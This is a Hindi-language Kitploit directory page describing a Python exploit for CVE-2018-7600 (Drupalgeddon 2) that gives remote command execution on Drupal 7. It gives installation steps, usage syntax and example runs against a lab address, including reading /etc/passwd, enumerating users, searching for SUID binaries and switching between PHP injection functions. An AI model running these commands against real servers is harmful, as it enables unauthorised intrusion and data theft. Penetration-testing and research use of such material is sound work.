Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Drupalgeddon2-CVE-2018-7600 — CVE-2018-7600 (Drupalgeddon 2) के लिए Python शोषण जो Drupal 7 पर दूरस्थ कोड निष्पादन सक्षम करता है, कई इंजेक्शन विधियों और Linux और Windows के लिए पूर्वनिर्धारित कमांड के साथ। | Kitploit
उपकरण/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

CVE-2018-7600 (Drupalgeddon 2) के लिए Python शोषण जो Drupal 7 पर दूरस्थ कोड निष्पादन सक्षम करता है, कई इंजेक्शन विधियों और Linux और Windows के लिए पूर्वनिर्धारित कमांड के साथ।

रिपॉजिटरी देखें
57 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 विवरण

bixi.py एक शोषण है जो CVE‑2018‑7600 (Drupalgeddon 2) कमजोरी के लिए है जो Drupal 7 को प्रभावित करता है। यह एक सहज इंटरफ़ेस और पूर्वनिर्धारित आदेशों के माध्यम से कमजोर Drupal सर्वरों पर रिमोट कमांड निष्पादन (RCE) की अनुमति देता है।


⚠️ अस्वीकरण / कानूनी सूचना

यह सॉफ्टवेयर केवल नियंत्रित वातावरण में शैक्षिक और अनुसंधान उद्देश्यों के लिए है।

  • केवल उन प्रणालियों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति है
  • अनधिकृत उपयोग अवैध है और इसके परिणामस्वरूप आपराधिक दंड हो सकता है
  • लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है
  • हमेशा स्थानीय और अंतरराष्ट्रीय साइबर सुरक्षा कानूनों का पालन करें

"With great power comes great responsibility"


📋 विशेषताएँ

  • ✅ CVE‑2018‑7600 का स्वचालित शोषण
  • ✅ Linux और Windows के लिए पूर्वनिर्धारित आदेश
  • ✅ एकाधिक इंजेक्शन विधियाँ (system, passthru, exec, shell_exec)
  • ✅ सहायता प्रणाली के साथ सहज इंटरफ़ेस
  • ✅ मजबूत त्रुटि प्रबंधन और समय-सीमा
  • ✅ स्वरूपित और पढ़ने में आसान आउटपुट

🚀 त्वरित स्थापना

1. रिपॉजिटरी क्लोन करें

git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600

2. निर्भरताएँ स्थापित करें

# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests

# अन्य वितरण
pip3 install requests

3. निष्पादन अनुमति दें

chmod +x bixi.py

🎯 मूल उपयोग

पूर्ण सहायता देखें

python3 bixi.py --help

सामान्य वाक्यविन्यास

python3 bixi.py <URL> <COMANDO/PALABRA_CLAVE> [INJECTION_TYPE]

व्यावहारिक उदाहरण

# भेद्यता जांचें
python3 bixi.py http://10.99.99.6/drupal/ test

# ऑपरेटिंग सिस्टम का पता लगाएं
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows

# उपयोगकर्ताओं की गणना करें
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user

# सिस्टम जानकारी
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig

# अनुकूलित आदेश
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"

📊 पूर्वनिर्धारित कीवर्ड

🐧 Linux

आदेशविवरण
linuxसिस्टम जानकारी
users_linuxउपयोगकर्ताओं की सूची बनाएं
idउपयोगकर्ता/समूह जानकारी
lsफ़ाइलों की सूची बनाएं
ifconfigनेटवर्क जानकारी
find_flagझंडे खोजें

🪟 Windows

आदेशविवरण
windowsसिस्टम जानकारी
net_userउपयोगकर्ताओं की सूची बनाएं
whoami_winविस्तृत जानकारी
ipconfigनेटवर्क
netstat_winकनेक्शन
dirनिर्देशिका सूची बनाएं

🔧 Pentesting

आदेशविवरण
sudosudo विशेषाधिकार जांचें
suidSUID बाइनरी खोजें
net_localgroupस्थानीय समूह
drupal_configकॉन्फ़िगरेशन खोजें
drupal_versionDrupal संस्करण प्राप्त करें

🎨 इंजेक्शन विधियाँ

# system (डिफ़ॉल्ट)
python3 bixi.py http://target/ "whoami" system

# passthru
python3 bixi.py http://target/ "whoami" passthru

# exec
python3 bixi.py http://target/ "whoami" exec

# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec

🏗️ परियोजना संरचना

drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│   ├── linux_commands.txt
│   └── windows_commands.txt
└── screenshots/
    ├── help_screen.png
    └── exploit_success.png

🔧 उन्नत कॉन्फ़िगरेशन

प्रॉक्सी (वैकल्पिक)

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

टाइमआउट

डिफ़ॉल्ट मान बदलें (15 सेकंड):

timeout=15

नए आदेश जोड़ें

get_command_for_keyword() में commands शब्दकोश संपादित करें


🐛 समस्या समाधान

त्रुटि: 'requests' नाम का कोई मॉड्यूल नहीं

pip3 install requests

त्रुटि: कनेक्शन अस्वीकृत

# कनेक्टिविटी जांचें
ping TARGET_IP

# Drupal पथ जांचें
curl http://TARGET_IP/drupal/
टूल डाउनलोड करें